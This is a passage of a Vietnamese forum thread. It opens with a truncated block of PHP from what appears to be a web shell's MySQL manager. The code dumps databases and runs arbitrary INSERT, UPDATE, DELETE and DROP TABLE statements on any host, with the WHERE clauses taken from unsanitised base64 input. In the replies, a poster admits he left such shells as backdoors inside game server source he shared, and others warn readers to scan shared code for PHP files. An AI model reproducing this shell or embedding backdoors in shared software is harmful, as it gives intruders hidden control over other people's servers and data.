        $dbform .= "<input type=\"hidden\" id=\"charset\" name=\"charset\" value=\"$charset\" />\n";
    }

    if ($doing == 'backupmysql' && $saveasfile) {
        if (!$table) {
            m('Please choose the table');
        } else {
            dbconn($dbhost,$dbuser,$dbpass,$dbname,$charset,$dbport);
            $table = array_flip($table);
            $fp = @fopen($path,'w');
            if ($fp) {
                $result = q('SHOW tables');
                if (!$result) p('<h2>'.mysql_error().'</h2>');
                $mysqldata = '';
                while ($currow = mysql_fetch_array($result)) {
                    if (isset($table[$currow[0]])) {
                        sqldumptable($currow[0], $fp);
                    }
                }
                fclose($fp);
                $fileurl = str_replace(SA_ROOT,'',$path);
                m('Database has success backup to <a href="'.$fileurl.'" target="_blank">'.$path.'</a>');
                mysql_close();
            } else {
                m('Backup failed');
            }
        }
    }
    if ($insert && $insertsql) {
        $keystr = $valstr = $tmp = '';
        foreach($insertsql as $key => $val) {
            if ($val) {
                $keystr .= $tmp.$key;
                $valstr .= $tmp."'".addslashes($val)."'";
                $tmp = ',';
            }
        }
        if ($keystr && $valstr) {
            dbconn($dbhost,$dbuser,$dbpass,$dbname,$charset,$dbport);
            m(q("INSERT INTO $tablename ($keystr) VALUES ($valstr)") ? 'Insert new record of success' : mysql_error());
        }
    }
    if ($update && $insertsql && $base64) {
        $valstr = $tmp = '';
        foreach($insertsql as $key => $val) {
            $valstr .= $tmp.$key."='".addslashes($val)."'";
            $tmp = ',';
        }
        if ($valstr) {
            $where = base64_decode($base64);
            dbconn($dbhost,$dbuser,$dbpass,$dbname,$charset,$dbport);
            m(q("UPDATE $tablename SET $valstr WHERE $where LIMIT 1") ? 'Record updating' : mysql_error());
        }
    }
    if ($doing == 'del' && $base64) {
        $where = base64_decode($base64);
        $delete_sql = "DELETE FROM $tablename WHERE $where";
        dbconn($dbhost,$dbuser,$dbpass,$dbname,$charset,$dbport);
        m(q("DELETE FROM $tablename WHERE $where") ? 'Deletion record of success' : mysql_error());
    }

    if ($tablename && $doing == 'drop') {
        dbconn($dbhost,$dbuser,$dbpass,$dbname,$charset,$dbport);
        if (q("DROP TABLE $tablename")) {
            m('Drop table of success');
            $tablename = '';
        } else {
            m(mysql_error());
        }
    }

    $charsets = array(''=>'Default','gbk'=>'GBK', 'big5'=>'Big5', 'utf8'=>'UTF-8', 'latin1'=>'Latin1');

    formhead(array('title'=>'MYSQL Manager'));
    makehide('action','sqladmin');
    p('<p>');
    p('DBHost:');
    makeinput(array('name'=>'dbhost','size'=>20,'value'=>$dbhost));
    p(':');
    makeinput(array('name'=>'dbport','size'=>4,'value'=>$dbport));
    p('DBUser:');
    makeinput(array('name'=>'dbuser','size'=>15,'value'=>$dbuser));
    p('DBPass:');
    makeinput(array('name'=>'dbpass','size'=>15,'value'=>$dbpass));
    p('DBCharset:');
    makeselect(array('name'=>'charset','option'=>$charsets,'selected'=>$charset));
    makeinput(array('name'=>'connect','value'=>'Connect','type'=>'submit','class'=>'bt'));
    p('</p>');
    formfoot();
?>
<script type="text/javascript">
function editrecord(action, base64, tablename){
    if (action == 'del') {
        if (!confirm('Is or isn\'t deletion record?')) return;
    }
    $('recordlist').doing.value=action;
    $('recordlist').base64.value=base64;
    $('recordlist').tablename.value=tablename;
    $('recordlist').submit();
}
function moddbname(dbname) {
    if(!dbname) return;
    $('setdbname').dbname.value=dbname;
    $('setdbname').submit();
}
function settable(tablename,doing,page) {
    if(!tablename) return;
    if (doing) {
        $('settable').doing.value=doing;
    }
    if (page) {
        $('settable').page.value=page;
    }
    $('settable').tablename.value=tablename;
    $('settable').submit();
}
</script>
<?php
    // SQL
    formhead(array('name'=>'recordlist'));
    makehide('doing');
    makehide('action','sqladmin');
    makehide('base64');
    makehide('tablename');
    p($dbform);
    formfoot();

    // Data
    formhead(array('name'=>'setdbname'));
    makehide('action','sqladmin');
    p($dbform);
    if (!$dbname) {
        makehide('dbname');
    }
    formfoot();


    formhead(array('name'=>'settable'));
    makehide('action','sqladmin');
    p($dbform);
    makehide('tablename');
    makehide('page',$page);
    makehide('doing');
    formfoot();

    $cachetables = array();
    $pagenum = 30;
    $page = intval($page);
    if($page) {
        $start_limit = ($page - 1) * $pagenum;
    } else {
        $start_limit = 0;
        $page = 1;
    }
    if (isset($dbhost) && isset($dbuser) && isset($dbpass) && isset($connect)) {
        dbconn($dbhost, $dbuser, $dbpass, $dbname, $charset, $dbport);
        // get mysql server
        $mysqlver = mysql_get_server_info();
        p('<p>MySQL '.$mysqlver.' running in '.$dbhost.' as '.$dbuse

[trong0981]

mình cũng k mún làm lớn chuyện. dù sao vudung cũng đóng góp nhiều cho 4r và cũng là một thiên tài vì mình coi một vài code do vudung viết (tuy ko share) khá chuyên nghiệp.

nhưng vudung cũng nên tránh ko nên up shell kèm với source share. làm thế chả khác gì đi vừa đánh vừa xoa.

[hai07dv]

mình cũng k mún làm lớn chuyện. dù sao vudung cũng đóng góp nhiều cho 4r và cũng là một thiên tài vì mình coi một vài code do vudung viết (tuy ko share) khá chuyên nghiệp.

nhưng vudung cũng nên tránh ko nên up shell kèm với source share. làm thế chả khác gì đi vừa đánh vừa xoa.

Chắc để chống lại vụ rip site or online đkvs đó mà ..ai đưa lên xài source đó cho sập luôn

[vudung]

Cái này chắc phải sr mấy bác

Mình toàn để shell trong mấy game mà mình đã từng mở để khi server bị hack hoặc quên pass thì có cái mà còn vào lại. Lúc bị ddos còn có cái mà đánh command reset server.

Lúc share quên mất, cũng chủ quan tại nghĩ ae sẽ check Lần sau share sẽ nhớ việc này ( tại vì thường những source mình share toàn lâu rồi k xài nên k còn nhớ nữa)

Chứ để mấy con shell vào đi hack server làm j , có rảnh éo đâu mà đi làm mấy trò này

[bachugacon122]

Cái này chắc phải sr mấy bác

Mình toàn để shell trong mấy game mà mình đã từng mở để khi server bị hack hoặc quên pass thì có cái mà còn vào lại. Lúc bị ddos còn có cái mà đánh command reset server.

Lúc share quên mất, cũng chủ quan tại nghĩ ae sẽ check Lần sau share sẽ nhớ việc này ( tại vì thường những source mình share toàn lâu rồi k xài nên k còn nhớ nữa)

Chứ để mấy con shell vào đi hack server làm j , có rảnh éo đâu mà đi làm mấy trò này

sax, toppic năm ngoái :'(, giờ lục lên làm gì nữa bác @@

[vudung]

sax, toppic năm ngoái :'(, giờ lục lên làm gì nữa bác @@

Cảnh báo mọi người thôi. Xài source share chịu khó search .php . Mất tầm 10 phút thôi mà an toàn